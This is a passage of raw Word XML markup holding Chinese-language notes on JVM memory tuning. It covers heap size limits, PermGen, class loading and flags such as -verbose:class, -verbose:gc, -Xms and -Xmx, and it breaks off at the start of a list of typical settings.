        </w:rPr>
        <w:t>其它参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94F1A" w:rsidRDefault="006F1527" w:rsidP="009A653D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">JVM </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中最大堆大小有三方面限制：相关操作系统的数据模型（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>32-bt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>还是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>64-bit</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）限制；系统的可用虚拟内存限制；系统的可用物理内存限制。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>位系统下，一般限制在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.5G~2G</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为操作系统对内存无限制。我在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server 2003 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>系统，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3.5G</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>物理内存，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK5.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下测试，最大可设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1478m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002242E7" w:rsidRPr="00C51765" w:rsidRDefault="002242E7" w:rsidP="00BA0B8F">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的类和加载类的类加载器本身同样需要存储空间，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Sun JDK </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中它们也被</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002242E7" w:rsidRPr="00C51765" w:rsidRDefault="002242E7" w:rsidP="00BA0B8F">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>存储在堆中，这个区域叫做永久代（</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">PermGen </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002242E7" w:rsidRPr="00C51765" w:rsidRDefault="002242E7" w:rsidP="00BA0B8F">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注意的一点是</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">JVM </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是按需来加载类的，曾经有个疑问：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">JVM </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果要加载一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002242E7" w:rsidRPr="00625AF5" w:rsidRDefault="002242E7" w:rsidP="00625AF5">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>包是否把这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">jar </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>包中的所有类都加载到内存中？显然不是的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">JVM </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>只会加载那些在你的应用程序中明确使用的类到内存中。要查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">JVM </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>到底加载了哪些类，可以在启动参数上</w:t>
      </w:r>
      <w:r w:rsidRPr="00994499">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>加上</w:t>
      </w:r>
      <w:r w:rsidRPr="00994499">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-verbose:class</w:t>
      </w:r>
      <w:r w:rsidRPr="00994499">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E154D" w:rsidRPr="00994499" w:rsidRDefault="006E154D" w:rsidP="002242E7">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-verbose:gc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，可以辅助输出一些详细的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94F1A" w:rsidRDefault="00C94F1A" w:rsidP="00710288">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-Xms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>初始</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>大小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-Xmx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最大值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1527" w:rsidRPr="00F41A4C" w:rsidRDefault="006F1527" w:rsidP="009A653D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>典型设置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1527" w:rsidRPr="00F41A4C" w:rsidRDefault="006F1527" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
